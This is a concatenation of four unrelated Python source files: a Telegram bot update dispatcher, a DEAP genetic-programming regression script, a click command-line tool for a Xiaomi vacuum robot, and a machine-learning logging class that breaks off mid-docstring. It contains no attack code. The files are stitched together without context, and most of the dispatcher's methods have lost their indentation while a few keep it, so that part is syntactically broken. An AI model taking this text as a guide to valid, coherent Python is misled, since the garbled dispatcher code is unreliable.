def removeTelegramMessageHandler(self, handler):
"""
De-registers a message handler.
Args:
handler (any):
"""
if handler in self.telegram_message_handlers:
self.telegram_message_handlers.remove(handler)
def removeTelegramInlineHandler(self, handler):
"""
De-registers an inline query handler.
Args:
handler (any):
"""
if handler in self.telegram_inline_handlers:
self.telegram_inline_handlers.remove(handler)
def removeTelegramCommandHandler(self, command, handler):
"""
De-registers a command handler.
Args:
command (str): The command
handler (any):
"""
if command in self.telegram_command_handlers \
and handler in self.telegram_command_handlers[command]:
self.telegram_command_handlers[command].remove(handler)
def removeTelegramRegexHandler(self, matcher, handler):
"""
De-registers a regex handler.
Args:
matcher (str/__Regex): The regex matcher object or string
handler (any):
"""
if matcher in self.telegram_regex_handlers \
and handler in self.telegram_regex_handlers[matcher]:
self.telegram_regex_handlers[matcher].remove(handler)
def removeStringCommandHandler(self, command, handler):
"""
De-registers a string-command handler.
Args:
command (str): The command
handler (any):
"""
if command in self.string_command_handlers \
and handler in self.string_command_handlers[command]:
self.string_command_handlers[command].remove(handler)
def removeStringRegexHandler(self, matcher, handler):
"""
De-registers a regex handler.
Args:
matcher (str/__Regex): The regex matcher object or string
handler (any):
"""
if matcher in self.string_regex_handlers \
and handler in self.string_regex_handlers[matcher]:
self.string_regex_handlers[matcher].remove(handler)
def removeUnknownTelegramCommandHandler(self, handler):
"""
De-registers an unknown-command handler.
Args:
handler (any):
"""
if handler in self.unknown_telegram_command_handlers:
self.unknown_telegram_command_handlers.remove(handler)
def removeUnknownStringCommandHandler(self, handler):
"""
De-registers an unknown-command handler.
Args:
handler (any):
"""
if handler in self.unknown_string_command_handlers:
self.unknown_string_command_handlers.remove(handler)
def removeErrorHandler(self, handler):
"""
De-registers an error handler.
Args:
handler (any):
"""
if handler in self.error_handlers:
self.error_handlers.remove(handler)
def removeTypeHandler(self, the_type, handler):
"""
De-registers a type handler.
Args:
handler (any):
"""
if the_type in self.type_handlers \
and handler in self.type_handlers[the_type]:
self.type_handlers[the_type].remove(handler)
def dispatchTelegramCommand(self, update, context=None):
"""
Dispatches an update that contains a command.
Args:
command (str): The command keyword
update (telegram.Update): The Telegram update that contains the
command
"""
command = split('\W', update.message.text[1:])[0]
if command in self.telegram_command_handlers:
self.dispatchTo(self.telegram_command_handlers[command], update,
context=context)
else:
self.dispatchTo(self.unknown_telegram_command_handlers, update,
context=context)
    def dispatchRegex(self, update, context=None):
        """
        Dispatches an update to all string or telegram regex handlers that
        match the string/message content.

        Args:
            update (str, Update): The update that should be checked for matches
        """
        if isinstance(update, Update):
            handlers = self.telegram_regex_handlers
            to_match = update.message.text
        elif isinstance(update, str):
            handlers = self.string_regex_handlers
            to_match = update

        # NOTE(review): if update is neither an Update nor a str, `handlers`
        # is unbound and the loop below raises NameError; callers appear to
        # pre-filter in processUpdate — confirm before relying on this.
        for matcher in handlers:
            m = match(matcher, to_match)
            if m:
                # Forward the regex capture groups to each handler.
                for handler in handlers[matcher]:
                    self.call_handler(handler,
                                      update,
                                      groups=m.groups(),
                                      groupdict=m.groupdict(),
                                      context=context)
def dispatchStringCommand(self, update, context=None):
"""
Dispatches a string-update that contains a command.
Args:
update (str): The string input
"""
command = update.split(' ')[0][1:]
if command in self.string_command_handlers:
self.dispatchTo(self.string_command_handlers[command], update,
context=context)
else:
self.dispatchTo(self.unknown_string_command_handlers, update,
context=context)
def dispatchType(self, update, context=None):
"""
Dispatches an update of any type.
Args:
update (any): The update
"""
for t in self.type_handlers:
if isinstance(update, t):
self.dispatchTo(self.type_handlers[t], update, context=context)
def dispatchTelegramMessage(self, update, context=None):
"""
Dispatches an update that contains a regular message.
Args:
update (telegram.Update): The Telegram update that contains the
message.
"""
self.dispatchTo(self.telegram_message_handlers, update,
context=context)
def dispatchTelegramInline(self, update, context=None):
"""
Dispatches an update that contains an inline update.
Args:
update (telegram.Update): The Telegram update that contains the
message.
"""
self.dispatchTo(self.telegram_inline_handlers, update, context=None)
def dispatchError(self, update, error):
"""
Dispatches an error.
Args:
update (any): The pdate that caused the error
error (telegram.TelegramError): The Telegram error that was raised.
"""
for handler in self.error_handlers:
handler(self.bot, update, error)
def dispatchTo(self, handlers, update, **kwargs):
"""
Dispatches an update to a list of handlers.
Args:
handlers (list): A list of handler-functions.
update (any): The update to be dispatched
"""
for handler in handlers:
self.call_handler(handler, update, **kwargs)
    def call_handler(self, handler, update, **kwargs):
        """
        Calls an update handler. Checks the handler for keyword arguments and
        fills them, if possible.

        Args:
            handler (function): An update handler function
            update (any): An update
        """
        target_kwargs = {}
        # NOTE(review): inspect.getargspec was removed in Python 3.11;
        # getfullargspec is the replacement — confirm the targeted version.
        fargs = getargspec(handler).args

        '''
        async handlers will receive all optional arguments, since we can't
        their argument list.
        '''
        # run_async wraps handlers in a function whose varargs is literally
        # named 'pargs'; that name is the async-detection contract here.
        is_async = 'pargs' == getargspec(handler).varargs

        if is_async or 'update_queue' in fargs:
            target_kwargs['update_queue'] = self.update_queue

        if is_async or 'args' in fargs:
            # Derive the "args" list from the update content: message text
            # split on spaces (minus the command word), the inline query
            # split on spaces, or None for anything else.
            if isinstance(update, Update) and update.message:
                args = update.message.text.split(' ')[1:]
            elif isinstance(update, Update) and update.inline_query:
                args = update.inline_query.query.split(' ')
            elif isinstance(update, str):
                args = update.split(' ')[1:]
            else:
                args = None

            target_kwargs['args'] = args

        # Regex capture information, forwarded by dispatchRegex when present.
        if is_async or 'groups' in fargs:
            target_kwargs['groups'] = kwargs.get('groups', None)

        if is_async or 'groupdict' in fargs:
            target_kwargs['groupdict'] = kwargs.get('groupdict', None)

        if is_async or 'context' in fargs:
            target_kwargs['context'] = kwargs.get('context', None)

        handler(self.bot, update, **target_kwargs)
|
import random
import math
import numpy
import operator
from deap import creator, base, tools, algorithms, gp
from GAToolbox import get_toolbox
def main():
    """Run symbolic regression with DEAP GP against the target function.

    Returns:
        tuple: (pop, log, hof) — final population, evolution log, and the
        30-individual hall of fame.
    """
    # list all the functions to analyse
    functions = [math.sin]
    # create the toolbox
    toolbox = get_toolbox(functions[0])
    random.seed(318)  # fixed seed for reproducible runs

    # create a new population
    pop = toolbox.population(n=300)
    hof = tools.HallOfFame(30)

    # collect some statistics on fitness values and individual sizes
    stats_fit = tools.Statistics(lambda ind: ind.fitness.values)
    stats_size = tools.Statistics(len)
    mstats = tools.MultiStatistics(fitness=stats_fit, size=stats_size)
    mstats.register("avg", numpy.mean)
    mstats.register("std", numpy.std)
    mstats.register("min", numpy.min)
    mstats.register("max", numpy.max)

    # do the evolution (crossover prob 0.5, mutation prob 0.1, 40 generations)
    pop, log = algorithms.eaSimple(pop, toolbox, 0.5, 0.1, 40, stats=mstats,
                                   halloffame=hof, verbose=True)
    # print(log)

    # print the Hall of Fame together with their fitness value
    for ind in hof:
        # Subscript binds tighter than %, so this formats getValues()[0].
        print('%.4f'%(ind.fitness.getValues())[0], ':', ind)
    return pop, log, hof


if __name__ == "__main__":
    main()
|
# -*- coding: UTF-8 -*-
import ast
import json
import logging
import pathlib
import sys
import threading
import time
from pprint import pformat as pf
from typing import Any # noqa: F401
import click
import pretty_cron
from appdirs import user_cache_dir
from tqdm import tqdm
import miio # noqa: E402
from miio.click_common import (ExceptionHandlerGroup, validate_ip,
validate_token, )
from .device import UpdateState
from .updater import OneShotServer
_LOGGER = logging.getLogger(__name__)
pass_dev = click.make_pass_decorator(miio.Device, ensure=True)
@click.group(invoke_without_command=True, cls=ExceptionHandlerGroup)
@click.option('--ip', envvar="MIROBO_IP", callback=validate_ip)
@click.option('--token', envvar="MIROBO_TOKEN", callback=validate_token)
@click.option('-d', '--debug', default=False, count=True)
@click.option('--id-file', type=click.Path(dir_okay=False, writable=True),
              default=user_cache_dir('python-miio') + '/python-mirobo.seq')
@click.version_option()
@click.pass_context
def cli(ctx, ip: str, token: str, debug: int, id_file: str):
    """A tool to command Xiaomi Vacuum robot."""
    # Configure logging first: -d can be repeated, any count enables DEBUG.
    if debug:
        logging.basicConfig(level=logging.DEBUG)
        _LOGGER.info("Debug mode active")
    else:
        logging.basicConfig(level=logging.INFO)
    # if we are scanning, we do not try to connect.
    if ctx.invoked_subcommand == "discover":
        ctx.obj = "discover"
        return
    if ip is None or token is None:
        click.echo("You have to give ip and token!")
        sys.exit(-1)
    # Restore protocol sequence numbers persisted by cleanup(); a missing or
    # corrupt id-file simply means we start counting from zero.
    start_id = manual_seq = 0
    try:
        with open(id_file, 'r') as f:
            x = json.load(f)
            start_id = x.get("seq", 0)
            manual_seq = x.get("manual_seq", 0)
            _LOGGER.debug("Read stored sequence ids: %s", x)
    except (FileNotFoundError, TypeError, ValueError):
        pass
    vac = miio.Vacuum(ip, token, start_id, debug)
    vac.manual_seqnum = manual_seq
    _LOGGER.debug("Connecting to %s with token %s", ip, token)
    # Subcommands receive the device via the pass_dev decorator.
    ctx.obj = vac
    # With no subcommand given, default to showing status and persist state.
    if ctx.invoked_subcommand is None:
        ctx.invoke(status)
        cleanup(vac, id_file=id_file)
@cli.resultcallback()
@pass_dev
def cleanup(vac: miio.Vacuum, **kwargs):
    """Persist the device's protocol sequence numbers so the next CLI
    invocation can resume from them (read back in cli())."""
    if vac.ip is None:  # dummy Device for discovery, skip teardown
        return
    id_file = kwargs['id_file']
    seqs = {'seq': vac.raw_id, 'manual_seq': vac.manual_seqnum}
    _LOGGER.debug("Writing %s to %s", seqs, id_file)
    path_obj = pathlib.Path(id_file)
    # FIX: renamed 'dir' (shadowed the builtin) and use the clearer
    # Path.parent instead of parents[0] — same directory either way.
    cache_dir = path_obj.parent
    try:
        cache_dir.mkdir(parents=True)
    except FileExistsError:
        pass  # after dropping py3.4 support, use exist_ok for mkdir
    with open(id_file, 'w') as f:
        json.dump(seqs, f)
@cli.command()
@click.option('--handshake', type=bool, default=False)
def discover(handshake):
    """Search for robots in the network."""
    # Handshake probing and mDNS discovery are alternative mechanisms.
    if not handshake:
        miio.Discovery.discover_mdns()
        return
    miio.Vacuum.discover()
@cli.command()
@pass_dev
def status(vac: miio.Vacuum):
    """Returns the state information."""
    res = vac.status()
    if not res:
        return  # nothing to show without a status response
    # Errors are highlighted in bold red before the regular report.
    if res.error_code:
        click.echo(click.style("Error: %s !" % res.error,
                               bold=True, fg='red'))
    click.echo(click.style("State: %s" % res.state, bold=True))
    for line in ("Battery: %s %%" % res.battery,
                 "Fanspeed: %s %%" % res.fanspeed,
                 "Cleaning since: %s" % res.clean_time,
                 "Cleaned area: %s m²" % res.clean_area):
        click.echo(line)
@cli.command()
@pass_dev
def consumables(vac: miio.Vacuum):
    """Return consumables status."""
    res = vac.consumable_status()
    # One row per consumable: (format string, used time, time left).
    rows = (
        ("Main brush: %s (left %s)", res.main_brush, res.main_brush_left),
        ("Side brush: %s (left %s)", res.side_brush, res.side_brush_left),
        ("Filter: %s (left %s)", res.filter, res.filter_left),
        ("Sensor dirty: %s (left %s)", res.sensor_dirty, res.sensor_dirty_left),
    )
    for fmt, used, left in rows:
        click.echo(fmt % (used, left))
@cli.command()
@click.argument('name', type=str, required=True)
@pass_dev
def reset_consumable(vac: miio.Vacuum, name):
    """Reset consumable state.
    Allowed values: main_brush, side_brush, filter, sensor_dirty
    """
    from miio.vacuum import Consumable
    # Dispatch table instead of an if/elif chain: keeps the allowed
    # values in one place and scales to new consumables.
    consumable_map = {
        'main_brush': Consumable.MainBrush,
        'side_brush': Consumable.SideBrush,
        'filter': Consumable.Filter,
        'sensor_dirty': Consumable.SensorDirty,
    }
    try:
        consumable = consumable_map[name]
    except KeyError:
        click.echo("Unexpected state name: %s" % name)
        return
    click.echo("Resetting consumable '%s': %s" % (
        name,
        vac.consumable_reset(consumable)
    ))
@cli.command()
@pass_dev
def start(vac: miio.Vacuum):
    """Start cleaning."""
    outcome = vac.start()
    click.echo("Starting cleaning: %s" % outcome)
@cli.command()
@pass_dev
def spot(vac: miio.Vacuum):
    """Start spot cleaning."""
    outcome = vac.spot()
    click.echo("Starting spot cleaning: %s" % outcome)
@cli.command()
@pass_dev
def pause(vac: miio.Vacuum):
    """Pause cleaning."""
    outcome = vac.pause()
    click.echo("Pausing: %s" % outcome)
@cli.command()
@pass_dev
def stop(vac: miio.Vacuum):
    """Stop cleaning."""
    outcome = vac.stop()
    click.echo("Stop cleaning: %s" % outcome)
@cli.command()
@pass_dev
def home(vac: miio.Vacuum):
    """Return home."""
    outcome = vac.home()
    click.echo("Requesting return to home: %s" % outcome)
@cli.group()
@pass_dev
# @click.argument('command', required=False)
def manual(vac: miio.Vacuum):
    """Control the robot manually."""
    # FIX: the previous body compared a hard-coded empty string against
    # 'start'/'stop', so both branches were unreachable dead code. The
    # real start/stop entry points are the subcommands registered below.
# The following two commands intentionally shadow the top-level start/stop
# inside the 'manual' group (hence the F811 noqa markers).
@manual.command()  # noqa: F811 # redefinition of start
@pass_dev
def start(vac: miio.Vacuum):
    """Activate the manual mode."""
    click.echo("Activating manual controls")
    return vac.manual_start()
@manual.command()  # noqa: F811 # redefinition of stop
@pass_dev
def stop(vac: miio.Vacuum):
    """Deactivate the manual mode."""
    click.echo("Deactivating manual controls")
    return vac.manual_stop()
@manual.command()
@pass_dev
@click.argument('degrees', type=int)
def left(vac: miio.Vacuum, degrees: int):
    """Turn to left."""
    click.echo("Turning %s degrees left" % degrees)
    # Positive rotation turns left; linear velocity stays 0.
    return vac.manual_control(degrees, 0)
@manual.command()
@pass_dev
@click.argument('degrees', type=int)
def right(vac: miio.Vacuum, degrees: int):
    """Turn to right."""
    # CONSISTENCY FIX: report the angle just like the 'left' command does
    # (the old message was a bare "Turning right").
    click.echo("Turning %s degrees right" % degrees)
    # Negative rotation turns right.
    return vac.manual_control(-degrees, 0)
@manual.command()
@click.argument('amount', type=float)
@pass_dev
def forward(vac: miio.Vacuum, amount: float):
    """Run forwards."""
    click.echo("Moving forwards")
    # Zero rotation, positive velocity -> straight ahead.
    return vac.manual_control(0, amount)
@manual.command()
@click.argument('amount', type=float)
@pass_dev
def backward(vac: miio.Vacuum, amount: float):
    """Run backwards."""
    click.echo("Moving backwards")
    # Zero rotation, negative velocity -> straight back.
    return vac.manual_control(0, -amount)
@manual.command()
@pass_dev
@click.argument('rotation', type=float)
@click.argument('velocity', type=float)
@click.argument('duration', type=int)
def move(vac: miio.Vacuum, rotation: float, velocity: float, duration: int):
    """Pass raw manual values"""
    # Annotation corrected to float: click converts 'rotation' with
    # type=float, so the previous 'int' annotation was wrong.
    return vac.manual_control(rotation, velocity, duration)
@cli.command()
@click.argument('cmd', required=False)
@click.argument('start_hr', type=int, required=False)
@click.argument('start_min', type=int, required=False)
@click.argument('end_hr', type=int, required=False)
@click.argument('end_min', type=int, required=False)
@pass_dev
def dnd(vac: miio.Vacuum, cmd: str,
        start_hr: int, start_min: int,
        end_hr: int, end_min: int):
    """Query and adjust do-not-disturb mode."""
    if cmd == "off":
        click.echo("Disabling DND..")
        # CONSISTENCY FIX: use click.echo like every other command instead
        # of a bare print().
        click.echo(vac.disable_dnd())
    elif cmd == "on":
        click.echo("Enabling DND %s:%s to %s:%s" % (start_hr, start_min,
                                                    end_hr, end_min))
        click.echo(vac.set_dnd(start_hr, start_min, end_hr, end_min))
    else:
        # No (or unknown) cmd: just report the current DND window.
        x = vac.dnd_status()
        click.echo(click.style("Between %s and %s (enabled: %s)" % (
            x.start, x.end, x.enabled), bold=x.enabled))
@cli.command()
@click.argument('speed', type=int, required=False)
@pass_dev
def fanspeed(vac: miio.Vacuum, speed):
    """Query and adjust the fan speed."""
    # BUG FIX: 'if speed:' treated an explicit 0 as "no argument" and fell
    # through to the query branch; compare against None instead so every
    # given value — including 0 — is forwarded to the device.
    if speed is not None:
        click.echo("Setting fan speed to %s" % speed)
        vac.set_fan_speed(speed)
    else:
        click.echo("Current fan speed: %s" % vac.fan_speed())
@cli.group(invoke_without_command=True)
@pass_dev
@click.pass_context
def timer(ctx, vac: miio.Vacuum):
    """List and modify existing timers."""
    # When a subcommand (add/delete/update) was invoked, it does the work.
    if ctx.invoked_subcommand is not None:
        return
    timers = vac.timer()
    click.echo("Timezone: %s\n" % vac.timezone())
    # Renamed the loop variable so it no longer shadows this function.
    for idx, timer_ in enumerate(timers):
        color = "green" if timer_.enabled else "yellow"
        click.echo(click.style("Timer #%s, id %s (ts: %s)" % (
            idx, timer_.id, timer_.ts), bold=True, fg=color))
        click.echo("  %s" % timer_.cron)
        # FIX: the old code split the cron string into five fields
        # (shadowing the builtin 'min') only to rejoin the identical
        # string; pass the cron expression through directly.
        click.echo("  %s" % pretty_cron.prettify_cron(timer_.cron))
@timer.command()
@click.option('--cron')
@click.option('--command', default='', required=False)
@click.option('--params', default='', required=False)
@pass_dev
def add(vac: miio.Vacuum, cron, command, params):
    """Add a timer."""
    result = vac.add_timer(cron, command, params)
    click.echo(result)
@timer.command()
@click.argument('timer_id', type=int, required=True)
@pass_dev
def delete(vac: miio.Vacuum, timer_id):
    """Delete a timer."""
    result = vac.delete_timer(timer_id)
    click.echo(result)
@timer.command()
@click.argument('timer_id', type=int, required=True)
@click.option('--enable', is_flag=True)
@click.option('--disable', is_flag=True)
@pass_dev
def update(vac: miio.Vacuum, timer_id, enable, disable):
    """Enable/disable a timer."""
    from miio.vacuum import TimerState
    # Both flags set, or neither: the request is ambiguous.
    if enable == disable:
        click.echo("You need to specify either --enable or --disable")
        return
    vac.update_timer(timer_id, TimerState.On if enable else TimerState.Off)
@cli.command()
@pass_dev
def find(vac: miio.Vacuum):
    """Find the robot."""
    click.echo("Sending find the robot calls.")
    click.echo(vac.find())
# NOTE: 'map' shadows the builtin map() at module level. This is
# intentional — the function name is the CLI subcommand name — but the
# builtin must not be used below this point in the module.
@cli.command()
@pass_dev
def map(vac: miio.Vacuum):
    """Return the map token."""
    click.echo(vac.map())
@cli.command()
@pass_dev
def info(vac: miio.Vacuum):
    """Return device information."""
    try:
        res = vac.info()
        click.echo("%s" % res)
        _LOGGER.debug("Full response: %s", pf(res.raw))
    except TypeError:
        # Presumably vac.info() yields None without cloud connectivity, so
        # the attribute access / formatting raises TypeError — TODO confirm.
        click.echo("Unable to fetch info, this can happen when the vacuum "
                   "is not connected to the Xiaomi cloud.")
@cli.command()
@pass_dev
def cleaning_history(vac: miio.Vacuum):
    """Query the cleaning history."""
    res = vac.clean_history()
    click.echo("Total clean count: %s" % res.count)
    click.echo("Cleaned for: %s (area: %s m²)" % (res.total_duration,
                                                  res.total_area))
    click.echo()
    # NOTE: idx counts history ids, not individual runs — every detail
    # entry fetched for the same id is printed with the same "Clean #".
    for idx, id_ in enumerate(res.ids):
        for e in vac.clean_details(id_):
            # Completed runs are shown green, interrupted ones yellow.
            color = "green" if e.complete else "yellow"
            click.echo(click.style(
                "Clean #%s: %s-%s (complete: %s, error: %s)" % (
                    idx, e.start, e.end, e.complete, e.error),
                bold=True, fg=color))
            click.echo("  Area cleaned: %s m²" % e.area)
            click.echo("  Duration: (%s)" % e.duration)
            click.echo()
@cli.command()
@click.argument('volume', type=int, required=False)
@click.option('--test', 'test_mode', is_flag=True, help="play a test tune")
@pass_dev
def sound(vac: miio.Vacuum, volume: int, test_mode: bool):
    """Query and change sound settings."""
    # An explicit volume (including 0) is applied before reporting.
    if volume is not None:
        click.echo("Setting sound volume to %s" % volume)
        vac.set_sound_volume(volume)
    if test_mode:
        vac.test_sound_volume()
    # Always finish with the current sound configuration.
    for fmt, getter in (("Current sound: %s", vac.sound_info),
                        ("Current volume: %s", vac.sound_volume),
                        ("Install progress: %s", vac.sound_install_progress)):
        click.echo(fmt % getter())
@cli.command()
@click.argument('url')
@click.argument('md5sum', required=False, default=None)
@click.option('--sid', type=int, required=False, default=10000)
@click.option('--ip', required=False)
@pass_dev
def install_sound(vac: miio.Vacuum, url: str, md5sum: str, sid: int, ip: str):
    """Install a sound.
    When passing a local file this will create a self-hosting server
    for the given file and the md5sum will be calculated automatically.
    For URLs you have to specify the md5sum manually.
    `--ip` can be used to override automatically detected IP address for
    the device to contact for the update.
    """
    click.echo("Installing from %s (md5: %s) for id %s" % (url, md5sum, sid))
    local_url = None
    server = None
    if url.startswith("http"):
        # Remote URL: the device downloads it directly, md5 must be given.
        if md5sum is None:
            click.echo("You need to pass md5 when using URL for updating.")
            return
        local_url = url
    else:
        # Local file: serve it once from this machine; md5 is computed.
        server = OneShotServer(url)
        local_url = server.url(ip)
        md5sum = server.md5
        t = threading.Thread(target=server.serve_once)
        t.start()
        click.echo("Hosting file at %s" % local_url)
    click.echo(vac.install_sound(local_url, md5sum, sid))
    # Poll once per second until the device reports the install finished.
    progress = vac.sound_install_progress()
    while progress.is_installing:
        progress = vac.sound_install_progress()
        print("%s (%s %%)" % (progress.state.name, progress.progress))
        time.sleep(1)
    progress = vac.sound_install_progress()
    if progress.is_errored:
        click.echo("Error during installation: %s" % progress.error)
    else:
        click.echo("Installation of sid '%s' complete!" % sid)
    # The serving thread 't' only exists in the local-file branch.
    if server is not None:
        t.join()
@cli.command()
@pass_dev
def serial_number(vac: miio.Vacuum):
    """Query serial number."""
    serial = vac.serial_number()
    click.echo("Serial#: %s" % serial)
@cli.command()
@click.argument('tz', required=False)
@pass_dev
def timezone(vac: miio.Vacuum, tz=None):
    """Query or set the timezone."""
    # Without an argument this is a pure query.
    if tz is None:
        click.echo("Timezone: %s" % vac.timezone())
        return
    click.echo("Setting timezone to: %s" % tz)
    click.echo(vac.set_timezone(tz))
@cli.command()
@click.argument('enabled', required=False, type=bool)
@pass_dev
def carpet_mode(vac: miio.Vacuum, enabled=None):
    """Query or set the carpet mode."""
    # No argument -> query; otherwise apply the requested setting.
    result = vac.carpet_mode() if enabled is None else vac.set_carpet_mode(enabled)
    click.echo(result)
@cli.command()
@click.argument('ssid', required=True)
@click.argument('password', required=True)
@click.argument('uid', type=int, required=False)
@click.option('--timezone', type=str, required=False, default=None)
@pass_dev
def configure_wifi(vac: miio.Vacuum, ssid: str, password: str,
                   uid: int, timezone: str):
    """Configure the wifi settings.
    Note that some newer firmwares may expect you to define the timezone
    by using --timezone."""
    # NOTE(review): 'uid' is presumably the Xiaomi cloud user id — confirm
    # against miio.Vacuum.configure_wifi before documenting further.
    click.echo("Configuring wifi to SSID: %s" % ssid)
    click.echo(vac.configure_wifi(ssid, password, uid, timezone))
@cli.command()
@pass_dev
def update_status(vac: miio.Vacuum):
    """Return update state and progress."""
    state = vac.update_state()
    click.echo("Update state: %s" % state)
    # Progress is only meaningful while a download is running.
    if state == UpdateState.Downloading:
        click.echo("Update progress: %s" % vac.update_progress())
@cli.command()
@click.argument('url', required=True)
@click.argument('md5', required=False, default=None)
@click.option('--ip', required=False)
@pass_dev
def update_firmware(vac: miio.Vacuum, url: str, md5: str, ip: str):
    """Update device firmware.
    If `url` starts with http* it is expected to be an URL.
    In that case md5sum of the file has to be given.
    `--ip` can be used to override automatically detected IP address for
    the device to contact for the update.
    """
    # TODO Check that the device is in updateable state.
    click.echo("Going to update from %s" % url)
    if url.lower().startswith("http"):
        if md5 is None:
            click.echo("You need to pass md5 when using URL for updating.")
            return
        click.echo("Using %s (md5: %s)" % (url, md5))
    else:
        # Local file: host it ourselves and let the device download it.
        server = OneShotServer(url)
        url = server.url(ip)
        t = threading.Thread(target=server.serve_once)
        t.start()
        click.echo("Hosting file at %s" % url)
        md5 = server.md5
    update_res = vac.update(url, md5)
    if update_res:
        click.echo("Update started!")
    else:
        click.echo("Starting the update failed: %s" % update_res)
    # Progress bar; note 't' is rebound from the serving thread to tqdm
    # here, matching the original behavior.
    with tqdm(total=100) as t:
        state = vac.update_state()
        while state == UpdateState.Downloading:
            try:
                state = vac.update_state()
                progress = vac.update_progress()
            except Exception:
                # FIX: narrowed from a bare 'except:' which also swallowed
                # KeyboardInterrupt/SystemExit. We may not get our messages
                # through during the upload, so just keep polling.
                continue
            if state == UpdateState.Installing:
                click.echo("Installation started, please wait until the vacuum reboots")
                break
            t.update(progress - t.n)
            t.set_description("%s" % state.name)
            time.sleep(1)
@cli.command()
@click.argument('cmd', required=True)
@click.argument('parameters', required=False)
@pass_dev
def raw_command(vac: miio.Vacuum, cmd, parameters):
    """Run a raw command."""
    # literal_eval safely parses the CLI-supplied Python literal; a missing
    # argument means "no parameters".
    params = ast.literal_eval(parameters) if parameters else []  # type: Any
    click.echo("Sending cmd %s with params %s" % (cmd, params))
    click.echo(vac.raw_command(cmd, params))
if __name__ == "__main__":
    cli()
|
import os
import time
import numpy as np
import pandas as pd
from util import util
from datasets import save_file
from torch.utils.tensorboard import SummaryWriter
class Visualizer:
    """
    This class print/save logging information

    Depending on param.isTrain / param.isTest it opens append-mode text
    logs (train_log/train_summary, test_log/test_summary) under
    <checkpoints_dir>/<experiment_name>/ and one TensorBoard writer per
    phase. Note: the train_* / test_* attributes only exist when the
    corresponding flag is set.
    """
    def __init__(self, param):
        """
        Initialize the Visualizer class
        """
        # param is the experiment options object; assumed to provide
        # checkpoints_dir, experiment_name, isTrain, isTest — TODO confirm.
        self.param = param
        tb_dir = os.path.join(param.checkpoints_dir, param.experiment_name, 'tb_log')
        util.mkdir(tb_dir)
        if param.isTrain:
            # Create a logging file to store training losses
            self.train_log_filename = os.path.join(param.checkpoints_dir, param.experiment_name, 'train_log.txt')
            with open(self.train_log_filename, 'a') as log_file:
                now = time.strftime('%c')
                log_file.write('----------------------- Training Log ({:s}) -----------------------\n'.format(now))
            self.train_summary_filename = os.path.join(param.checkpoints_dir, param.experiment_name, 'train_summary.txt')
            with open(self.train_summary_filename, 'a') as log_file:
                now = time.strftime('%c')
                log_file.write('----------------------- Training Summary ({:s}) -----------------------\n'.format(now))
            # Create log folder for TensorBoard (cleared per run)
            tb_train_dir = os.path.join(param.checkpoints_dir, param.experiment_name, 'tb_log', 'train')
            util.mkdir(tb_train_dir)
            util.clear_dir(tb_train_dir)
            # Create TensorBoard writer
            self.train_writer = SummaryWriter(log_dir=tb_train_dir)
        if param.isTest:
            # Create a logging file to store testing metrics
            self.test_log_filename = os.path.join(param.checkpoints_dir, param.experiment_name, 'test_log.txt')
            with open(self.test_log_filename, 'a') as log_file:
                now = time.strftime('%c')
                log_file.write('----------------------- Testing Log ({:s}) -----------------------\n'.format(now))
            self.test_summary_filename = os.path.join(param.checkpoints_dir, param.experiment_name, 'test_summary.txt')
            with open(self.test_summary_filename, 'a') as log_file:
                now = time.strftime('%c')
                log_file.write('----------------------- Testing Summary ({:s}) -----------------------\n'.format(now))
            # Create log folder for TensorBoard (cleared per run)
            tb_test_dir = os.path.join(param.checkpoints_dir, param.experiment_name, 'tb_log', 'test')
            util.mkdir(tb_test_dir)
            util.clear_dir(tb_test_dir)
            # Create TensorBoard writer
            self.test_writer = SummaryWriter(log_dir=tb_test_dir)
    def print_train_log(self, epoch, iteration, losses, metrics, load_time, comp_time, batch_size, dataset_size):
        """
        print train log on console and save the message to the disk
        Parameters:
            epoch (int) -- current epoch
            iteration (int) -- current training iteration during this epoch
            losses (OrderedDict) -- training losses stored in the ordered dict
            metrics (OrderedDict) -- metrics stored in the ordered dict
            load_time (float) -- data loading time per data point (normalized by batch_size)
            comp_time (float) -- computational time per data point (normalized by batch_size)
            batch_size (int) -- batch size of training
            dataset_size (int) -- size of the training dataset
        """
        # min() clamps the count on the final, possibly partial batch.
        data_point_covered = min((iteration + 1) * batch_size, dataset_size)
        message = '[TRAIN] [Epoch: {:3d} Iter: {:4d} Load_t: {:.3f} Comp_t: {:.3f}] '.format(epoch, data_point_covered, load_time, comp_time)
        # Each loss/metric entry is a sequence; [-1] is its latest value.
        for name, loss in losses.items():
            message += '{:s}: {:.4f} '.format(name, loss[-1])
        for name, metric in metrics.items():
            message += '{:s}: {:.4f} '.format(name, metric[-1])
        print(message)  # print the message
        with open(self.train_log_filename, 'a') as log_file:
            log_file.write(message + '\n')  # save the message
    def print_train_summary(self, epoch, losses, metrics, train_time):
        """
        print the summary of this training epoch
        Parameters:
            epoch (int) -- epoch number of this training model
            losses (OrderedDict) -- the losses dictionary
            metrics (OrderedDict) -- the metrics dictionary
            train_time (float) -- time used for training this epoch
        """
        # Tab-separated means go to the summary file; the pretty message is
        # printed and each mean is also pushed to TensorBoard.
        write_message = '{:s}\t'.format(str(epoch))
        print_message = '[TRAIN] [Epoch: {:4d}] '.format(int(epoch))
        for name, loss in losses.items():
            write_message += '{:.6f}\t'.format(np.mean(loss))
            print_message += name + ': {:.6f} '.format(np.mean(loss))
            self.train_writer.add_scalar(name, np.mean(loss), epoch)
        for name, metric in metrics.items():
            write_message += '{:.6f}\t'.format(np.mean(metric))
            print_message += name + ': {:.6f} '.format(np.mean(metric))
            self.train_writer.add_scalar(name, np.mean(metric), epoch)
        with open(self.train_summary_filename, 'a') as log_file:
            log_file.write(write_message + '\n')
        train_time_msg = 'Training time used: {:.3f}s'.format(train_time)
        print_message += '\n' + train_time_msg
        print(print_message)
        with open(self.train_log_filename, 'a') as log_file:
            log_file.write(train_time_msg + '\n')
    def print_test_log(self, epoch, iteration, metrics, batch_size, dataset_size):
        """
        print performance metrics of this iteration on console and save the message to the disk
        Parameters:
            epoch (int) -- epoch number of this testing model
            iteration (int) -- current testing iteration during this epoch
            metrics (OrderedDict) -- testing metrics stored in the dictionary
            batch_size (int) -- batch size of testing
            dataset_size (int) -- size of the testing dataset
        """
        data_point_covered = min((iteration + 1) * batch_size, dataset_size)
        message = '[TEST] [Epoch: {:3d} Iter: {:4d}] '.format(int(epoch), data_point_covered)
        for name, metric in metrics.items():
            message += '{:s}: {:.4f} '.format(name, metric[-1])
        print(message)
        with open(self.test_log_filename, 'a') as log_file:
            log_file.write(message + '\n')
    def print_test_summary(self, epoch, metrics, test_time):
        """
        print the summary of this testing epoch
        Parameters:
            epoch (int) -- epoch number of this testing model
            metrics (OrderedDict) -- the metrics dictionary
